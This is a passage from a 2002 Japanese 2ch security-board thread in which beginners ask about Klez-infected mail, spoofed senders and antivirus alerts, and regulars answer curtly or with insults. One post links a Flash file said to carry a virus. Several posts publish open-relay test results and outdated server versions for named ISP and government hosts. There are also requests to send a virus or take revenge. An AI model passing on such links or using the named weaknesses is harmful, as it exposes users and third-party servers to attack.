5.ブロック毎に培地に盛り、培養する
6.ブロック毎に切り分け、耐性をテストする
7.検体が全部のテストに合格するまで2〜6を繰り返してでき上がり

培養時の注意
アオカビがつかないよう注意しましょう(アオカビを培養する場合を除く)
定期的に紫外線を照射し、雑菌の繁殖を防ぎましょう(最初の培養を除く)
紫外線で誤って検体を殺してしまわないよう注意しましょう

617 :604:02/08/27 06:49
>>607-608
ご親切に本当に有難うございました。
何とか分かりました。
>・・・Macユーザーですとかいうオチはないよね?
違います、大丈夫です(w

>612
氏ね。

618 :名無しさん@お腹いっぱい。:02/08/27 07:54
>>604
もう二度とセキュ板来んな

619 :名無しさん@お腹いっぱい。:02/08/27 08:38
Host()ウィルス まだぁ?

620 :名無しさん@お腹いっぱい。:02/08/27 11:43
age

621 :名無しさん@お腹いっぱい。:02/08/27 16:42


622 :名無しさん@お腹いっぱい。:02/08/28 00:04
age

623 : :02/08/28 01:15

ttp://moon.gaiax.com/home/d_show

624 :名無しさん@お腹いっぱい。:02/08/28 07:45
なんか中国製flashのウイルスが流行ってるみたいなんだけどどうなの?

ttp://www.miyun.com.cn/yule/flash/game/lianhuanmeng.swf

625 :名無しさん@お腹いっぱい。:02/08/28 09:24
すみません。なんかハードディスクがいつのまにか満杯になってしまいます。
はじめのうちは色々削除したりしながら空きを作ってたのですが最近なにもファイル
増やしていないのにまた残り20Mくらいになってしまいました。確実に
おとといは1Gくらい空きを作っていました。ウイルスってことあるのでしょうか?
お願いします。おしえてください。

626 :あぼーん:あぼーん
あぼーん

627 :名無しさん@お腹いっぱい。:02/08/28 10:03
>>625
得ろ動画をダウソしすぎです。

628 :名無しさん@お腹いっぱい。:02/08/28 10:18
>>627
そんな事言わないでおねがいしますよ。

629 :名無しさん@お腹いっぱい。:02/08/28 10:37
>>628
とりあえずOS書け。

630 :名無しさん@お腹いっぱい。:02/08/28 11:06
>>624
これってどこまでやるとヤバイの?

631 :名無しさん@お腹いっぱい。:02/08/28 11:24
AD簡でチェックしたが何も入ってない>>624

632 :名無しさん@お腹いっぱい。:02/08/28 12:41
>>625
最近何かで読んだなあ。詳しいことは覚えてないがウィルスじゃない。
隠しファイルだかなんかが膨れ上がってるんだったか・・・
自分で本屋行ってしらべてみ。結構分厚い本だったぞ。Windows辞典とか・・・

633 :名無しさん@お腹いっぱい。:02/08/28 14:05
定期あげ

634 :名無しさん@お腹いっぱい。:02/08/28 15:49
>>625
これは?
http://homepage2.nifty.com/winfaq/wme/trouble.html#489

635 :名無しさん@お腹いっぱい。:02/08/28 16:52
subjectが Re:***,sos! (*** は俺のアカウント名)という
HTMLメールが届いたんですが、
Lztk.scr と gms-small[2].jpg が添付されてました。
KLEZっぽいんですが、何でしょうか?



636 :名無しさん@お腹いっぱい。:02/08/28 17:04
>>635
まあKlezでしょう。
って何でアンチウイルスでスキャンしないの?

637 :名無しさん@お腹いっぱい。:02/08/28 17:17
>636
うちのメーラはhtmlメールを開かず、添付ファイルをデコードしないので
ウイルススキャンに引っかからないんですよ
よって添付ファイルを強制的に開かない限り感染の心配ないですけどね

638 :名無しさん@お腹いっぱい。:02/08/28 17:20
>>625
記憶にあったのは、調べたけど見つからなかった。
じゃあDOSプロンプトから仮想メモリを削除してみる?
ttp://www.zdnet.co.jp/help/tips/windows/w0175.html
もしかするとこれでいいかも。

639 :名無しさん@お腹いっぱい。:02/08/28 20:55
>618
お前、頭悪いな。ここが何のスレか考えてみろ、ニホンゴヨメマスカ?
>もう二度とセキュ板来んな
オマエガナー

640 :名無しさん@お腹いっぱい。:02/08/28 20:57
>って久しぶりに見たbyねこたん

641 :名無しさん@お腹いっぱい。:02/08/28 22:09
初心者です。質問ですが クレズウィルスは
hotmailで開いても感染するのですか?

642 :名無しさん@お腹いっぱい。:02/08/28 22:29
>>641はマルチ


http://pc.2ch.net/test/read.cgi/sec/1024255721/969

643 :名無しさん@お腹いっぱい。:02/08/28 22:42
>>642
も同じ穴のムジナだろう。アフォ度はお前が上だ。
答えてやったらイイだろうが。

644 :名無しさん@お腹いっぱい。:02/08/28 22:55
>>641えーとねぇ・・・


























   (V) ∧_∧(V)
    ヽ( ゚▽゚)ノ  オシエマシェーンだ
     /  /
    ノ ̄ゝ

645 :名無しさん@お腹いっぱい。:02/08/28 22:56
641=643


646 :名無しさん@お腹いっぱい。:02/08/28 23:22
馬鹿しかいないね、こういうところ

647 :質問です:02/08/28 23:38
よろしくお願いします。
先ほど怪しいメールが届きました。
タイトル:次を検索
差出人:0909878****@jp-k.ne.jp
本文:(空白)
形式:HTML

差出人が携帯電話なので安心して開封してしまいました。
これってウィルスでしょうか?メーラーはOutlook2000、
OSはwindowsME、Klez対策はしてあります。

どなたかコメントください。お願いします。

648 :質問です:02/08/29 00:04
他で尋ねます。失礼しました。。。

649 :あぼーん:あぼーん
あぼーん

650 :名無しさん@お腹いっぱい。:02/08/29 00:59
>>649おそらくね
怖いともうなら検索するなり>>1のリンク先でもみて勉強してくれ

651 :あぼーんだ!!!!!:02/08/29 02:02
何がだろ????
>>649

652 :名無しさん@お腹いっぱい。:02/08/29 02:09
メールアドレス晒してた

653 :onnbody:02/08/29 02:58
>>652
>メールアドレス晒してた

あー、うっかりしてました。つぃ。
すいませんでした。ご迷惑おかけしました。


654 :名無しさん@お腹いっぱい。:02/08/29 03:24
つか自分のだべ
あぶないから気をつけれ

655 :名無しさん@お腹いっぱい。:02/08/29 04:11
最近、突然現れるようになった症状なのですが
ケーブルの常時接続環境なのに、回線が一瞬だけ切断されるのです。
東風荘等のオンラインゲームをしている時にも
突然切れるので非常に困っています。

ノートンには何も反応しないし、切断時ZoneAlarmも無反応です。
Ad-awareも使ってみました。
ノートンでも発見できない新種のウイルスじゃないかと不安です・・・
どなたか対処法が分かる方がいたら助けてください・・・


656 :655:02/08/29 04:43
肝心なことを書き忘れてました。

回線は必ず約30分に1度の周期で切断されます。
あと同じプロバイダの友人にはこの症状は現れないため、
プロバイダが原因ということは無さそうです。
本当に原因不明です・・・

657 :名無しさん@お腹いっぱい。:02/08/29 04:53
どうして回線が切れることからウィルスまで話が飛躍するのかがわからない

>突然現れるようになった症状なのですが
ウィルスなりアプリのバッティングなりが原因なら
何かした覚えがあるだろうに
>あと同じプロバイダの友人にはこの症状は現れないため
たった一例でそうでないと言い切れる自信はどこから?

プロバ板にいったほうがいいと思うね

658 :655:02/08/29 05:45
>>657
アプリ系は特に心当たりないです・・・

>たった一例でそうでないと言い切れる自信はどこから?
確かにその通りです。軽率でした。
ただ本当に原因不明なため、ウイルスのせいにすることしか
思いつかなかったのです・・・
ではプロバ板に逝ってきまふ・・・
レス有り難うございました。




659 :名無しさん@お腹いっぱい。:02/08/29 06:19
フツーに考えて既出の原因の量と可能性なら

回線問題(プロバ・モデム・その他)>>>>>>>>>>ウィルス

だべよ

660 :655:02/08/29 06:47
>>659
本当に肝心なことを書き忘れていたんですが、
コントロールパネルに【ネットワークとダイアルアップ接続】って
あるじゃないですか?その接続維持時間はリセットされないんですよね。
だから回線問題よりもウィルスの方を疑ってしまったんですよね。
例えば強制的に何処かに接続しようとしているんじゃないか・・・
などの可能性を考えてしまったんです。
あとプロバイダの方にも連絡したんですけど
やっぱり原因不明だと言われて・・・
でも、もう一度回線問題方面(プロバ・モデム・その他)も
調べて直してみます。

661 :名無しさん@お腹いっぱい。:02/08/29 10:19
ターミナルの設定では?

662 :質問:02/08/29 10:20
掲示板がクラックされた時のクラッカーに対しての対処法をおしえていただけませんか?

663 :名無しさん@お腹いっぱい。:02/08/29 10:46
>>662
スレタイトル見てるか?

664 :onnbody:02/08/29 10:49
>>654
自分のじゃないんですよ(藁
なおさらですよね。
というか、その番号自体が存在しているのか不明ですが。

メールの方は削除しました。

665 :名無しさん@お腹いっぱい。:02/08/29 12:27
W32/Bare.worm
http://www.nai.com/japan/virusinfo/virB.asp?v=W32/Bare.worm

P2P経由で感染するらしいです。破壊活動は一切行わないらしいです。
こういうウィルスの事なんて言うんでしたっけ?
あと素人質問ですが、これからはP2P経由で感染するウィルスが
増えてくるのでしょうか?既出?

666 :メリモリ:02/08/29 13:35
昨日、普通にチャットしてたら、「お前○○県の○○接続だろ」とか言われました。
仕返ししてやりたいので、方法を教えてください、少しは勉強してきました。


667 :_:02/08/29 13:38
>>666
マルチ

668 :655:02/08/29 13:46
>>661
ターミナルの設定を見直してみたのですが、
特に異常は見つかりませんでした・・・

ただ皆さんのレスで
「ウィルスが原因という可能性は低い」ということが
分かったので少し安心できました。
あとは回線自体の問題のようなので
もう少し色々とやってみます。
レス本当に有り難うございました。

669 :名無しさん@お腹いっぱい。:02/08/29 13:57
>>665
worm(ワーム)ってじぶんで書いてるべ
P2P云々は
あんたみたいなのがいると、まぁばら撒いてみたくなんでないのかね

670 :名無しさん@お腹いっぱい。:02/08/29 15:52
>>665
そうじゃなくて無害のウィルスをばらまいて、
こういう感染ルートがあるから気を付けろっていう警告みたいな
ウィルスの事だよ。

あとMXは使った事ないです。

671 :名無しさん@お腹いっぱい。:02/08/29 15:53
>>670
s/>>665/>>669/
逝っています。

672 :改竄されています:02/08/29 17:17
改竄されています
http://tx.028.co.jp/

http://whois.nic.ad.jp/cgi-bin/whois_gw?key=028.CO.JP
http://uptime.netcraft.com/up/graph?site=tx.028.co.jp
OS Server Last changed IP address Netblock Owner
NT4/Windows 98 Microsoft-IIS/3.0 18-Aug-2002 219.96.201.22 NTT COMMUNICATIONS CORPORATION
tx.028.co.jpはスパムメールを送信しています。
http://tmp.2ch.net/test/read.cgi/tubo/1026829452/225-228

ホストの検索 - その他の RBL への登録状況
http://www.ordb.org/lookup/rbls/?host=tx.028.co.jp
http://relays.visi.com/nph-l?219.96.201.22
We notified postmaster@028.co.jp and abuse@028.co.jp
of this listing on Fri Jun 21 18:35:05 CDT 2002.

673 :名無しさん@お腹いっぱい。:02/08/29 18:00
改竄されたページを見るたび思う

日 本 語 で 書 け !!!

674 :名無しさん@お腹いっぱい。:02/08/29 18:09
どこがウイルスなんだろうか(以下略)

675 :名無しさん@お腹いっぱい。:02/08/29 20:26
>>672
I just Wanna s4y f**k USA Gouvernement And israel
Must Be F**k3d oFF

(´_ゝ`)フーン 



676 :名無しさん@お腹いっぱい。:02/08/30 01:57
質問です。

個人で商用サイトを運営しているのですが、
毎日毎日6人(多分・・・)の方からWORM_KLEZ.Hを添付したメールを頂いております。
かれこれもう4ヶ月。
一応警告のメールを何度か出し、
「全く気付きませんでした。ありがとうございました」との
返信は貰ったのですが・・・

私の方は、プロバイダーでウィルスチェックをして貰っているので、
既に駆除済みのものが届きますので心配はないのですが、
プロバイダーからのウィルス検出のお知らせも同時に届くので非常に困ります。

2人のうちの一人は過去のお客様ですのであまり強くも言えずにいたのです。
でもいい加減運営に差支えがでて来たのでウィルスメールのアドバイスHPに
あった方法通り、私のHP上に警告文を乗せようと思ったのです。

プロバイダーからのアラートのおかげで、発信元のアドレスはわかっているのですが・・・
やっぱり晒すのはマズイですよね?
こういう場合はどうしたら良いのでしょうか?

よろしければご意見をお願いしたいです。




677 :676:02/08/30 01:58
>2人のうちの一人は過去のお客様ですので

「6人のうち2人は」の間違いでした。
すみません・・・

678 :名無しさん@お腹いっぱい。:02/08/30 02:27
ここで聞かれてもなぁ
セキュリティ云々でなくて商売の問題だべ

添付ファイルは受けとんねぇよってページに書いて
添付ファイルはそのままゴミ箱とかに振りわけっとか

679 :名無しさん@お腹いっぱい。:02/08/30 04:08
なんか矢印等が文字化けしているんですが、これはウイルスなんでしょうか?
あと最大化と最小化、閉じるのとこが意味不明な記号になっているんですが

680 :名無しさん@お腹いっぱい。:02/08/30 04:20
>>679まずぐぐれ馬鹿
http://www.google.co.jp/search?sourceid=navclient&hl=ja&q=%8D%C5%91%E5%89%BB+%8D%C5%8F%AC%89%BB+%95%B6%8E%9A%89%BB%82%AF

ネタか?どっちにしろお前の頭にはウィルスがいる間違いなくな

681 :名無しさん@お腹いっぱい。:02/08/30 05:18
>>680
直りました。
ありがとうございます

682 :名無しさん@お腹いっぱい。:02/08/30 13:06
ウイルスを送りたいのですが、どうすれば・・・?

683 :名無しさん@お腹いっぱい。:02/08/30 14:59
>>682
メールに添付して送る。メールの送り方わかる?

684 :名無しさん@お腹いっぱい。:02/08/30 16:10
すいません、教えてください。

webメールでホットメールを使っているのですが、(ブラウザはIE6です)
最近、本文なし・添付ファイルなし・件名のみのメールがよく来ます。
でもメールのサイズが、130〜140KBくらいあります。
添付ファイルがないのでウイルスじゃない気もするのですが、
どうなんでしょう?
それとも、差出人が何かしらのウイルスに
感染しているということでしょうか?

ちなみに差出人は毎回ばらばらで、
普通のプロバイダーのアドレスや、
無料チャットレンタルサイトやネットショップのアドレスです。
(↑ググったら出てきた)
しかし、そのレンタルサイトやネットショップなどのサイトに
訪れたことはありませんし、
普通のプロバイダーのアドレスの人も、
全く知らない人です。

685 :メールヘッダは?:02/08/30 16:25
  

686 : :02/08/30 16:28
>685
ま、ウィルスでしょう。
実際には添付ファイルがあったんだけど、
デコードミスかhotmail のウィルス対策かで出てこないだけでしょ。
知らない人なんでしょ、差出人は。
だったらあっさりと削除。

687 :名無しさん@お腹いっぱい。:02/08/30 17:11
PE_FUNLOVE.4099って感染するだけで害は無いって本当でしょうか?
俺のPCは感染してからoutloockの起動が異様に遅くなったり日本語で
入力できなくなったり小トラブルが続発します。
あと、感染してないPCを使わず自力で駆除する方法はないでしょうか。

688 :_:02/08/30 17:14
>>687
これ見る
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=2418

689 :名無しさん@お腹いっぱい。:02/08/30 17:28
謎のメールが会社のメールにも個人のメールにも立て続けに来ている。ひええ。
User.zipってのとSetup.zipてのが添付されてます。これってウイルスでしょ?

個人のにはなんと会社のアドレスから来ているのですが、トレンドマイクロのホームページで検索してもひっかからなかったんだよね。
それでも感染してるのかな。はああ

690 :687:02/08/30 17:31
>>688
そこを熟読した上で訊いてるんだけど・・・
まぁサンクスコ。

691 :名無しさん@お腹いっぱい。:02/08/30 17:33
>>689件名だの添付ファイル名で正確なウィルス名を割り出せる時代は終わった。
スキャンする気すらないならこんなとこに書き込むな

692 :名無しさん@お腹いっぱい。:02/08/30 17:38
なんか嫌な書き込みだなぁ。
そんな書き方してると誰も答えてくれなくなるぞ。

693 :名無しさん@お腹いっぱい。:02/08/30 17:38
>>692は690宛な。


694 :名無しさん@お腹いっぱい。:02/08/30 17:40
>>687
シマンテックのほうが良さげ
http://www.symantec.com/region/jp/sarcj/data/w/w32.funlove.4099.html

695 :687:02/08/30 17:43
ごめんよ>>688・・・

696 :689:02/08/30 17:59
なんだかいろいろ足りない書込みですまんです。みなさん気が立っているよね。

トレンドマイクロのホームページからウイルススキャンをしても何も検索されなかったPC(会社の)から、謎の添付ファイルが送られて来ているということです。
会社でやりとりをしている所で感染してしまったPCがあり、そこがうちの会社を差出人として私宛にメールを送っているんではないかと、その感染したPCの持ち主は言ってます。(会社のと私のと両方のアドレスがそこには入っている)
でもそんなのってありえますか?差出人まで偽装なんてしませんよね?

697 :名無しさん@お腹いっぱい。:02/08/30 18:04
>差出人まで偽装なんてしませんよね?
(゚Д゚)ハァ?

  __        __       __
  |よし| ΛΛ  |よし| ΛΛ   |よし| ΛΛ   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 〃 ̄∩ ゚Д゚) 〃 ̄∩ ゚Д゚)  〃 ̄∩ ゚Д゚) < 全員一致で逝ってよし!
    ヾ.   )    ヾ.   )     ヾ.   )   \_____________
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
\                                                \
  | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ |
  |          逝ってよし認定委員会                    |
  |                                           |
\|                                           |



698 :名無しさん@お腹いっぱい。:02/08/30 18:06
>>696 勉強不足
http://www.nai.com/japan/virusinfo/klezezukai.asp

699 :名無しさん@お腹いっぱい。:02/08/30 18:08
つか君の会社のPCはもう色んなところにウィルスメールを送り続けてるかもね

700 :名無しさん@お腹いっぱい。:02/08/30 18:08
>>696
Klezスレ読んだこと有る?てか、KlezがReturn-Pathなどを偽装するなんてこと、もう10年まえから常識だと思ってたYO!
それで、チミはメールのチェックはできているの?ウィルス対策ソフト入れてないって言ったらぶっとばすよ?

701 :名無しさん@お腹いっぱい。:02/08/30 18:11
もう10年まえから常識だと思ってたYO!(・∀・)ンナワキャナイ!!

702 :名無しさん@お腹いっぱい。:02/08/30 18:14
ってゆっかおまいんところに来たメールの添付ファイルをスキャンすれ

アンチドート簡易版
http://www.vintage-solutions.com/Japanese/Antivirus/Super/index.html


703 :名無しさん@お腹いっぱい。:02/08/30 18:16
>>696
会社名教えれ

704 :cheshire-cat ◆CATJR.v6 :02/08/30 18:20
>>689
>トレンドマイクロのホームページからウイルススキャンをしても

どゆ職場かは知らんが。
感染の疑いがあるパソはLANから切り離す、これ常識。

705 :メールヘッダは?:02/08/30 18:27
Return-Pathかもしれぬが、よー分からんのが実情。



706 :名無しさん@お腹いっぱい。:02/08/30 18:38
689は失踪したようですな(w

707 :名無しさん@お腹いっぱい。:02/08/30 18:39
>みなさん気が立っているよね。
んなこと言わなきゃいいのに

708 :名無しさん@お腹いっぱい。:02/08/30 18:47
>689 半分ネタかと思っていたが、雲隠れしたところを見るとマジだったんだな

709 :cheshire-cat ◆CATJR.v6 :02/08/30 18:50
漏れの知人にさぁ。
相手を怒らすような事を自分から散々言ったくせに、とうとう相手が怒ると、「あんたは気が短い!」とか「私はこんなに困っているのに!なぜいじめるの!」ってわざとらしく騒ぐヤシがいる。

ちょっと、いや、かなり怖い。

710 :初心者を罵倒するスレッド:02/08/30 18:58
http://pc3.2ch.net/test/read.cgi/win/1028266693/

初心者に冷たい人ばかり
http://mentai.2ch.net/mukashi/entrance/kako/953/953264364.html

去ログ・歴戦の勇者たちの嘆き。
1st http://pc.2ch.net/win/kako/1013/10139/1013922363.html
2nd http://pc.2ch.net/win/kako/1019/10192/1019226654.html
3rd http://pc.2ch.net/win/kako/1022/10226/1022692960.html
4th http://pc.2ch.net/win/kako/1024/10249/1024932195.html
5th http://pc3.2ch.net/test/read.cgi/win/1026132381/l50

711 :名無しさん@お腹いっぱい。:02/08/30 19:09
俺が初心者の頃2chはなかった
俺が初心者の頃パソコン通信なんてもっとコワイ奴らでいっぱいだった
俺が初心者の頃検索エンジンにマシな情報は引っかからなかった
俺が初心者の頃常時接続なんかなくって電話代の請求書ほど恐ろしいものはなかった
俺が初心者の頃PCはワケワカラン落ち方をした何でOSが落ちたかなんてわからんかった

今お前らは恵まれていることを忘れるな

712 :名無しさん@お腹いっぱい。:02/08/30 19:10
>>710 それ、前にも貼ってなかった?

713 :前も貼った。:02/08/30 19:13
http://pc3.2ch.net/test/read.cgi/win/1028266693/
にあほ上司や、知人のあほサポート依頼の顛末を書き込んでください。


714 :名無しさん@お腹いっぱい。:02/08/30 20:11
これワラタ

http://osietekun.tripod.co.jp/

715 :名無しさん@お腹いっぱい。:02/08/30 20:23
>>714 この教えて君は病気じゃないのか(w

716 :名無しさん@お腹いっぱい。:02/08/30 20:23
ちんぱらって本当カスだね。誰がCD買うの?

717 :684:02/08/30 21:35
>>685-686
ありがとうございます。
今までは、ちょっと気にしつつ考えつつ削除していたのですが、
これからは容赦なくばっさり削除することにします。

718 :102 ◆Yh/5fqs. :02/08/30 23:55
ttp://ex.2ch.net/entrance/subback.html
ここは見てのとおりラウンジのスレッド一覧ですが
昨日か一昨日 なんかノートン先生のウィルス警告が出たんです
どうやら2月前くらいにはやってたウィルスソースに誤反応した見たいなんですが
スレタイにソースがあったわけではないのになぜ反応したんでしょうか
同じような症状になった方いませんか


719 :名無しさん@お腹いっぱい。:02/08/31 00:02
>>718 じっくり読んでください
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

720 :名無しさん@お腹いっぱい。:02/08/31 03:08
質問があるのですが、どなたか教えて頂けませんか?
わたしが使っている一つのメールアドレス(一般的な有料プロバイダ)に、
今月だけで数えると、18件のウイルス付きメールが来て、
その全部のヘッダーに以下の表示があるのです。

Received: from unknown (HELO smtp.yukaido.ne.jp) (210.230.82.4)
Received: from jxxxxxx.ap.plala.or.jp (218.224.xxx.xx)

ちなみに差出人表示は17人分で、それぞれドメインはバラバラのようです。
(一人だけ2通)

こういう状態で何ヶ月か続いてるので、誰かに嫌がらせされてるのかと
思うのですが、どこに聞くのが一番良いのでしょうか。
この愉快堂、もしくは、plala に聞けば、なにかしらの糸口は見えるのでしょうか?

なにか情報が足りなければ、追加でまた書き込みますので、
どうかよろしくお願いします。

721 :名無しさん@お腹いっぱい。:02/08/31 03:20
愉快堂ってなによ?どっかからのコピペ?
ま、おそらくklezだと思うけど

図解:Klez.e・klez.hとはどんなウイルスなのか?
http://www.nai.com/japan/virusinfo/klezezukai.asp
ここと
Klez.E、Klez系スレッド part4
http://pc.2ch.net/test/read.cgi/sec/1030175440/l50
ここの1と2あたりを読んで自分で考えてみれ

722 :名無しさん@お腹いっぱい。:02/08/31 03:30
愉快堂ってISPなのか
・・・さてと首でも吊ってきますか

723 :名無しさん@お腹いっぱい。:02/08/31 03:42
早速のお返事ありがとうございます。
おっしゃるようにノートンの表示は W32.Klez.H@mm になってまして
下側のリンクで調べてきました。
どうやら plala に感染者がいるようなんで、問い合わせのメールを
送ってみます。

調べ方が悪かったようでお手数をおかけしましたが、とにかく
素早い返事をありがとうございました。

ちなみに愉快堂(=yukaido)のつもりでした。失礼しました。

724 :愉快堂について:02/08/31 14:21
http://www.nanet.co.jp/rlytest/relaytest.html
smtp.yukaido.ne.jp
<220 smtp.yukaido.ne.jp ESMTP
>HELO rlytest.nanet.co.jp
<250 smtp.yukaido.ne.jp
>MAIL FROM:< TESTwww.nanet.co.jp/rlytest/requestedfrom[61.211.31.103]@smtp.yukaido.ne.jp >
<250 ok
>RCPT TO:<rlytest@nanet.co.jp>
<250 ok
>QUIT
<221 smtp.yukaido.ne.jp
問題あり:不正な中継を受け付けます。
(210.230.82.4)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。

725 :愉快堂:02/08/31 14:22
ホストの検索 - その他の RBL への登録状況
Host: smtp.yukaido.ne.jp (210.230.82.4)
http://www.ordb.org/lookup/rbls/?host=smtp.yukaido.ne.jp
http://dsbl.org/listing.php?ip=210.230.82.4&submit=Retrieve+Information
http://njabl.org/cgi-bin/lookup.cgi?query=210.230.82.4
210.230.82.4 is listed as either an open relay or direct spam source.
The following comment is associated with this record: relay tested
It was added to the list: Sat Dec 8 00:54:03 2001 EST
http://openrbl.org/ip/210/230/82/4.htm

http://ordb.org/translation/#not_a_relay
ファイヤーウォール等によりアクセス制限を行っているサイトでは、
ORDB.org からの通信が拒否されることがあります。
この場合は当方の中継設定に関する検査は行えません。
smtp.yukaido.ne.jpは不正中継を受け付けるがORDB未登録。


726 :愉快堂:02/08/31 14:33
http://uptime.netcraft.com/up/graph?mode_u=off&mode_w=on&site=mail1.yukaido.ne.jp
http://uptime.netcraft.com/up/graph?site=m1.yukaido.ne.jp
OS Server Last changed IP address Netblock Owner
FreeBSD Apache/1.3.26 (Unix) 31-Aug-2002 210.230.82.5 Yukaido shuppan (Sato,Tsutomu)

Last changed 31-Aug-2002 設定し直した?????

http://uptime.netcraft.com/up/graph?site=www.yukaido.ne.jp
OS Server Last changed IP address Netblock Owner
FreeBSD Apache/1.3.6 (Unix) 23-Nov-2000 210.230.82.29 Yukaido shuppan (Sato,Tsutomu)

Apache/1.3.6 古くないか???????

http://uptime.netcraft.com/up/hosted?netname=YUKAIDO-1,210.230.82.0,210.230.82.255
http://vill.kuni.gunma.jp/群馬県六合村公式ページがあるが、
Apache/1.3.4だが危なくないか???????

727 :名無しさん@お腹いっぱい。:02/08/31 14:43
 最近、知らない人から本文無しなんだけど容量がやたらでかいメールが来る…
添付ファイルとかないんだけど。件名が、Language(だったかな?)とか書いてある。

728 :名無しさん@お腹いっぱい。:02/08/31 14:48
>>727
ふーん、よかったねぇ

729 :名無しさん@お腹いっぱい。:02/08/31 15:17
>>727
ここは近況報告をするためのスレですか。

730 :名無しさん@お腹いっぱい。:02/08/31 19:08
2chのえっちねたの過去ログ見ようとするとVBS.Loveletter.A
に感染しました、と警告が出るんですけどこれは俺のせいですか?
メールは使って居ないのでそこから感染した訳ではないと思うので
不思議です。誰か謎を解明してください。

731 :名無しさん@お腹いっぱい。:02/08/31 19:11
>>730謎なんかとっくの昔に解明されてる、お前が馬鹿だから知らないだけ

ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/l50

732 :cheshire-cat ◆CATJR.v6 :02/08/31 19:18
>>727
添付ファイルのデコードに失敗しただけなんではないでしょか。

733 :730:02/08/31 19:35
>>731
うわーん。馬鹿って言うなよ。
知らなかったんだから。でも教えてくれて
ありがとう。助かりました。

734 :名無しさん@お腹いっぱい。:02/09/01 17:02
シマンテックのKlez.Hのページから引用ですが、これについて質問なんです。

> Windowsのアドレス帳、ICQデータベース、ローカルファイルから探し出した
> メールアドレスすべてに対し、自分自身を添付した電子メールを送りつけます。
> 差出人のアドレスは、感染先コンピュータ上で発見したメールアドレスから
> ランダムに選択されたものが使用されます。

これは、送信者は一人だけが選ばれるのでしょうか?それともある程度複数?
届いたウィルスメールの中に、自分が送信者になったものが今の所無いので
全員が送信者にさせられる、って事はないでしょうけど。

> そのメールの受信者が適切な修正プログラムが適用されていないMicrosoft Outlook または
> Outlook Expressで受信した場合、添付ファイルが自動的に実行される可能性があります。

又、感染に気付かない時は繰り返し発信するようですが、自動実行のタイミングと言うのは
PCを起動した時なのか、OEを起動した時なのか、それとも回線を接続した時?(繋ぎっぱの場合は?)
そして送り続ける時は同じ送信者名なのか、毎回違う名前に変わるのか・・・?
いろいろ聞いてしまいましたが、ご存知の方よろしくお願いします。

735 :名無しさん@お腹いっぱい。:02/09/01 17:39
>>730
かわいいなぁ

736 :教えてください:02/09/01 19:22
有るところから、しつこくウイルスメールらしきモノが来ます。
ヘッドが以下のようになっているんだけど、

Return-Path: aaaaaaaaa@bbbbbbb.ne.jp
Date: Sun, 1 Sep 2002 17:10:13 +0900 (JST)
From: cccccccc <cccccccc@ddddddddd.ne.jp>
To: xxxxxxxxxx.ne.jp

のようになってるんだけど、(xxxxxxは当方のアドレス)
このメール、aaaaaaaから来てるのか、ccccccから来てるのかどっちでしょうか。

737 :名無しさん@お腹いっぱい。:02/09/01 19:27
>>736
どちらも信用できないことがある。
もしKlezなら当然。

738 :メールヘッダは?:02/09/01 19:37
>>736

739 :名無しさん@お腹いっぱい。:02/09/01 19:38
ナゴヤ(・∀・)ヤットカメ!!

740 :名無しさん@お腹いっぱい。:02/09/01 19:42
アワユキ(・∀・)ウィロウ!!ダギャァ

741 :股、北!!!!!!!! KlezH:02/09/01 23:20
股、北!!!!!!!! KlezH
Received: from smtp01.asahi-it.com (EHLO smtp.asahi-it.com) (210.174.168.200)
by **
Received: from Ewhohgn (p78a29e.kngwnt01.ap.so-net.ne.jp [61.120.162.158])
by smtp.asahi-it.com (8.11.1/3.7W) with SMTP id g813ul093665
for <.co.jp>; Sun, 1 Sep 2002 12:56:47 +0900 (JST)
Date: Sun, 1 Sep 2002 12:56:47 +0900 (JST)
Message-Id:< 200209010356_g813ul093665@asahi-it.com >
From: onio <onioni____________@juno.ocn.ne.jp>
To: p78a29e_kngwnt01_ap_so-net_ne_jp_KlezH@so-net.ne.jp
asahi-it_com_p78a29e_kngwnt01_ap_so-net_ne_jp_KlezH@so-net.ne.jp
asahi-it_com_61_120_162_158_KlezH@so-net.ne.jp
p78a29e_kngwnt01_ap_so-net_ne_jp_KlezH@asahi-it.com
61_120_162_158_KlezH@asahi-it.com
Subject: (c) 2002 multi Allright reserved.



742 : :02/09/01 23:55
>>738
即、消したけど、
The Garden of Eden
なんて書いてました。

743 :741 旭いっと革命糞が森森神の國石川県:02/09/02 00:52
asahi-it.com klezを検索すると、
http://www.scramble-egg.com/virusinfo.htm
http://yuri.robot.mach.mie-u.ac.jp/~virusstat/old_log_1.html
に旭いっとがある。

http://yuri.robot.mach.mie-u.ac.jp/~virusstat/old_log_1.html
は三重大学情報処理センターだが、
只今までに検出されたウィルス 本日分(リアルタイム更新)
http://yuri.robot.mach.mie-u.ac.jp/~virusstat/today_log.txt
にquixnet.net、pref.mie.jpがある。
これは不正中継を行うようだ。
mail.quixnet.net (pri=10)
問題あり:不正な中継を受け付けます。
(63.65.123.12)
ORDB database...登録されています。
maps realtime blackhole list...登録されていません。

mj.pref.mie.jp (pri=10)
<<< 220 CheckPoint FireWall-1 secure SMTP server
問題あり:不正な中継を受け付けます。
(61.114.229.2)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。
http://uptime.netcraft.com/up/graph?mode_u=off&mode_w=on&site=www.pref.mie.jp
The site www.pref.mie.jp is running Microsoft-IIS/5.0 on Windows 2000.

744 :さおり:02/09/02 09:27
WINDOWSBOMB.Eって何者でしょうか?
どこを探しても載っていないようです。
どなたかご返答お願いします。


745 :名無しさん@お腹いっぱい。:02/09/02 11:42
>>744
http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=windowbomb&alt=windowbomb

746 :734:02/09/02 12:20
放置されっぱだ・・・(ρ_・。) クスン
マルチたんの気持ちがチョト判る罠

747 :名無しさん@お腹いっぱい。:02/09/02 12:51
